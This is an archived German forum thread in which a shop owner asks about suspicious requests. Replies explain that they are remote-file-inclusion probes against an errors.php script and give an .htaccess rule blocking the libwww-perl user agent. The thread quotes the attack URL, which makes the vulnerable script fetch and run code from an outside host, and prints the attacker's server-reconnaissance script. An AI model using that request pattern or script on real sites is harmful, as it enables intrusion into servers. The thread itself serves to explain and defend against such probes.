Herzlich willkommen im Archiv vom ABAKUS Online Marketing Forum
Du befindest Dich im Archiv vom ABAKUS Online Marketing Forum. Hier kannst Du Dich für das Forum mit den aktuellen Beiträgen registrieren.
Das ist nichts Besonderes. Lass' ihn suchen und seine Zeit verschwenden, denn du hast ja sicher immer aktuelle Software.Viktor1982 hat geschrieben:anscheinend sucht jemand eine Schwachstelle bei mir im Shop
Offensichtlich lässt (oder ließ) sich dein Skript errors.php mit dem Parameter error dazu verleiten, von irgendwo auf der Welt ein Skript runterzuladen und auszuführen. Sowas ist natürlich extrem dumm.//modules/mods_full/shopping_cart/includes/errors.php?error=https://fantalaranja.t35.com/idr0x.txt???
Das Skript spuckt lediglich ein paar erstmal unverfängliche Serverdaten aus: Betriebssystem, IP-Adresse, Plattenspeicher usw. Das Kürzel "pwd" bedeutet übrigens nicht "password", sondern steht für "print work(ing) directory", also das derzeitige Arbeitsverzeichnis.echo "narasaon was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
weiß den jamand was dies bedeutet
Das kannst du, aber dann sperrst du lediglich die Gelangweilten aus, die vor lauter Trübsinn sich nicht einmal dazu aufraffen konnten, libwww eine unverdächtigere Browserkennung übermitteln zu lassen - die sind keine Gefahr, die machen sich lediglich einen kleinen Spaß daraus, schlampige Seitenbetreiber, die aus Bequemlichkeit oder Unwissenheit auf Softwareupdates verzichten, bloßzustellen.wie kann man libWWW komplett sperren in der .htaccess ?
Code: Alles auswählen
RewriteEngine On
# block bad bots
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl
RewriteRule ^.* - [F,L]